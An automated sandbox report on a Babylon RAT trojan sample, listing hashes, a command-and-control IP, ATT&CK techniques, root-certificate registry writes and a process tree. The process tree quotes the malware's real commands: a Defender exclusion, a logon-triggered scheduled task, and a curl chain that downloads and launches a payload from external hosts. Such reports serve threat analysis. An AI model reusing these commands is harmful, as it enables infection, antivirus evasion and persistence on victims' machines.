babylonrat | 0217f0ab778acfba323a9b444c8661618fc23f23906f16fe46564a86e4b86836

Analysis

max time kernel
148s
max time network
149s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
26-06-2024 11:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-06-26_66383700fdfaca06f74a87cb628bb89f_poet-rat_snatch.exe
Size

4.9MB
MD5

66383700fdfaca06f74a87cb628bb89f
SHA1

f157bd262904db73a7da388470872386433f094f
SHA256

0217f0ab778acfba323a9b444c8661618fc23f23906f16fe46564a86e4b86836
SHA512

30894da96435b2fdb8136b2c071d42bae3cca3107d21b176a9529d0af145ee9589a43fda6dde4fd95ed7732ea6b39e8cfac2fbf941e70d95fec1072864c576cf
SSDEEP

49152:+ur1PwvIyeo+j+E5p9vTiOHWdC9hHbxCM5EmsMpQMLxA7i:FVo+jXJzWdC9lXEmGMN3

Score

10^/10

babylonrat execution trojan

Malware Config

Extracted

Family

babylonrat

147.185.221.20

Signatures

Babylon RAT
Babylon RAT is remote access trojan written in C++.
trojan babylonrat

Detects executables containing SQL queries to confidential data stores. Observed in infostealers 1 IoCs

resource	yara_rule
behavioral2/files/0x00070000000233f9-70.dat	INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2320	powershell.exe
3732	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
1056	svc-host.exe
3040	SecurityHealth.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service

T1102

flow	ioc
13	raw.githubusercontent.com
14	raw.githubusercontent.com
25	raw.githubusercontent.com

Modifies system certificate store 2 TTPs 6 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	2024-06-26_66383700fdfaca06f74a87cb628bb89f_poet-rat_snatch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	2024-06-26_66383700fdfaca06f74a87cb628bb89f_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2024-06-26_66383700fdfaca06f74a87cb628bb89f_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	2024-06-26_66383700fdfaca06f74a87cb628bb89f_poet-rat_snatch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	2024-06-26_66383700fdfaca06f74a87cb628bb89f_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	2024-06-26_66383700fdfaca06f74a87cb628bb89f_poet-rat_snatch.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2456	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2320	powershell.exe
2320	powershell.exe
1056	svc-host.exe
1056	svc-host.exe
3732	powershell.exe
3732	powershell.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe
1056	svc-host.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3040	SecurityHealth.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

description	pid	Process
Token: SeDebugPrivilege	2320	powershell.exe
Token: SeDebugPrivilege	1056	svc-host.exe
Token: SeDebugPrivilege	3732	powershell.exe
Token: SeShutdownPrivilege	3040	SecurityHealth.exe
Token: SeDebugPrivilege	3040	SecurityHealth.exe
Token: SeTcbPrivilege	3040	SecurityHealth.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3040	SecurityHealth.exe

Suspicious use of WriteProcessMemory 29 IoCs

description	pid	Process	procid_target
PID 3136 wrote to memory of 2320	3136	2024-06-26_66383700fdfaca06f74a87cb628bb89f_poet-rat_snatch.exe	81
PID 3136 wrote to memory of 2320	3136	2024-06-26_66383700fdfaca06f74a87cb628bb89f_poet-rat_snatch.exe	81
PID 3136 wrote to memory of 1056	3136	2024-06-26_66383700fdfaca06f74a87cb628bb89f_poet-rat_snatch.exe	83
PID 3136 wrote to memory of 1056	3136	2024-06-26_66383700fdfaca06f74a87cb628bb89f_poet-rat_snatch.exe	83
PID 3136 wrote to memory of 1056	3136	2024-06-26_66383700fdfaca06f74a87cb628bb89f_poet-rat_snatch.exe	83
PID 1056 wrote to memory of 3732	1056	svc-host.exe	84
PID 1056 wrote to memory of 3732	1056	svc-host.exe	84
PID 1056 wrote to memory of 3732	1056	svc-host.exe	84
PID 1056 wrote to memory of 2456	1056	svc-host.exe	89
PID 1056 wrote to memory of 2456	1056	svc-host.exe	89
PID 1056 wrote to memory of 2456	1056	svc-host.exe	89
PID 1056 wrote to memory of 4508	1056	svc-host.exe	93
PID 1056 wrote to memory of 4508	1056	svc-host.exe	93
PID 1056 wrote to memory of 4508	1056	svc-host.exe	93
PID 4508 wrote to memory of 4356	4508	cmd.exe	95
PID 4508 wrote to memory of 4356	4508	cmd.exe	95
PID 4508 wrote to memory of 4356	4508	cmd.exe	95
PID 4356 wrote to memory of 1080	4356	cmd.exe	96
PID 4356 wrote to memory of 1080	4356	cmd.exe	96
PID 4356 wrote to memory of 1080	4356	cmd.exe	96
PID 4508 wrote to memory of 3896	4508	cmd.exe	97
PID 4508 wrote to memory of 3896	4508	cmd.exe	97
PID 4508 wrote to memory of 3896	4508	cmd.exe	97
PID 1056 wrote to memory of 1000	1056	svc-host.exe	98
PID 1056 wrote to memory of 1000	1056	svc-host.exe	98
PID 1056 wrote to memory of 1000	1056	svc-host.exe	98
PID 1000 wrote to memory of 3040	1000	cmd.exe	100
PID 1000 wrote to memory of 3040	1000	cmd.exe	100
PID 1000 wrote to memory of 3040	1000	cmd.exe	100

C:\Users\Admin\AppData\Local\Temp\2024-06-26_66383700fdfaca06f74a87cb628bb89f_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-06-26_66383700fdfaca06f74a87cb628bb89f_poet-rat_snatch.exe"
1⤵
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:3136
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath \"$env:programdata\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2320
- C:\ProgramData\Microsoft\SvcHost\svc-host.exe
  C:\ProgramData\Microsoft\SvcHost\svc-host.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1056
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "%programdata%"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3732
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /Create /F /RL HIGHEST /SC ONLOGON /TN "Microsoft\Windows\SvcHost\SvcHost" /TR "cmd.exe /c start \"\" \"^%programdata^%\Microsoft\SvcHost\svc-host.exe\""
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2456
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c for /f "delims=" %i in ('curl -s https://rentry.co/o5kpirns/raw') do @curl -o "C:\ProgramData\Microsoft\Security\SecurityHealth.exe" %i 1>nul 2>&1
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4508
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c curl -s https://rentry.co/o5kpirns/raw
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4356
    - - C:\Windows\SysWOW64\curl.exe
        
        curl -s https://rentry.co/o5kpirns/raw
        5⤵
        
        PID:1080
  - - C:\Windows\SysWOW64\curl.exe
      curl -o "C:\ProgramData\Microsoft\Security\SecurityHealth.exe" https://raw.githubusercontent.com/Drelta/test/main/SecurityDiagram.txt
      4⤵
      PID:3896
- - C:\Windows\SysWOW64\cmd.exe
    cmd.exe /c start "" "C:\ProgramData\Microsoft\Security\SecurityHealth.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1000
  - - C:\ProgramData\Microsoft\Security\SecurityHealth.exe
      "C:\ProgramData\Microsoft\Security\SecurityHealth.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: GetForegroundWindowSpam
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      PID:3040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Security\SecurityHealth.exe

Filesize
733KB

MD5
73a2ea546c656ceaa289f9221b6a1f59

SHA1
75ae715e21b6c2d3fb229f566a54518ac044d58b

SHA256
fa7ce16aab3ede14a4274600b3787bc66047001264da0cdeb965f231a1fd826f

SHA512
260ea61d495af5911080f268402c9be539cb8623418a71602db71e7e9933a80002c5ccaa4c29c78a60b22f0a2e773df46e0bd6f0d9f26e0e050542873e77e3a6

Download Submit
C:\ProgramData\Microsoft\SvcHost\svc-host.exe

Filesize
400KB

MD5
7d8e36e0658b87c7235d754e8ada2502

SHA1
4d16fd939eb3ec3ce3a2ad33e0c8154631de582b

SHA256
1c71376c691b2802a5809f3e0cf715e4de2611a6008bd40a3c81cecd6c77c365

SHA512
4330acd4b9365027c89237ff037529845628faee5b6693612e0f45fe77ae60c7cd68914a129d94d1718d4702a95bfec5d6741e79e896186bf104179d62fafab6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w5cz2wmk.zj3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/2320-6-0x00000227E1420000-0x00000227E1442000-memory.dmp

Filesize
136KB

Download
memory/2320-11-0x00007FFFF3A30000-0x00007FFFF44F1000-memory.dmp

Filesize
10.8MB

Download
memory/2320-15-0x00007FFFF3A30000-0x00007FFFF44F1000-memory.dmp

Filesize
10.8MB

Download
memory/2320-14-0x00007FFFF3A30000-0x00007FFFF44F1000-memory.dmp

Filesize
10.8MB

Download
memory/2320-0-0x00007FFFF3A33000-0x00007FFFF3A35000-memory.dmp

Filesize
8KB

Download
memory/3732-23-0x0000000004DA0000-0x0000000004DD6000-memory.dmp

Filesize
216KB

Download
memory/3732-55-0x0000000007330000-0x00000000073D3000-memory.dmp

Filesize
652KB

Download
memory/3732-25-0x0000000074C80000-0x0000000075430000-memory.dmp

Filesize
7.7MB

Download
memory/3732-27-0x0000000005BC0000-0x0000000005BE2000-memory.dmp

Filesize
136KB

Download
memory/3732-28-0x0000000005C60000-0x0000000005CC6000-memory.dmp

Filesize
408KB

Download
memory/3732-29-0x0000000005CD0000-0x0000000005D36000-memory.dmp

Filesize
408KB

Download
memory/3732-39-0x0000000005D40000-0x0000000006094000-memory.dmp

Filesize
3.3MB

Download
memory/3732-24-0x0000000005410000-0x0000000005A38000-memory.dmp

Filesize
6.2MB

Download
memory/3732-41-0x0000000006350000-0x000000000636E000-memory.dmp

Filesize
120KB

Download
memory/3732-42-0x00000000063A0000-0x00000000063EC000-memory.dmp

Filesize
304KB

Download
memory/3732-43-0x0000000006910000-0x0000000006942000-memory.dmp

Filesize
200KB

Download
memory/3732-44-0x0000000070AA0000-0x0000000070AEC000-memory.dmp

Filesize
304KB

Download
memory/3732-54-0x0000000007310000-0x000000000732E000-memory.dmp

Filesize
120KB

Download
memory/3732-26-0x0000000074C80000-0x0000000075430000-memory.dmp

Filesize
7.7MB

Download
memory/3732-56-0x0000000007CC0000-0x000000000833A000-memory.dmp

Filesize
6.5MB

Download
memory/3732-57-0x0000000007680000-0x000000000769A000-memory.dmp

Filesize
104KB

Download
memory/3732-58-0x0000000007700000-0x000000000770A000-memory.dmp

Filesize
40KB

Download
memory/3732-59-0x00000000078F0000-0x0000000007986000-memory.dmp

Filesize
600KB

Download
memory/3732-60-0x0000000007880000-0x0000000007891000-memory.dmp

Filesize
68KB

Download
memory/3732-61-0x00000000078B0000-0x00000000078BE000-memory.dmp

Filesize
56KB

Download
memory/3732-62-0x00000000078C0000-0x00000000078D4000-memory.dmp

Filesize
80KB

Download
memory/3732-63-0x00000000079B0000-0x00000000079CA000-memory.dmp

Filesize
104KB

Download
memory/3732-64-0x00000000079A0000-0x00000000079A8000-memory.dmp

Filesize
32KB

Download
memory/3732-67-0x0000000074C80000-0x0000000075430000-memory.dmp

Filesize
7.7MB

Download
memory/3732-22-0x0000000074C8E000-0x0000000074C8F000-memory.dmp

Filesize
4KB

Download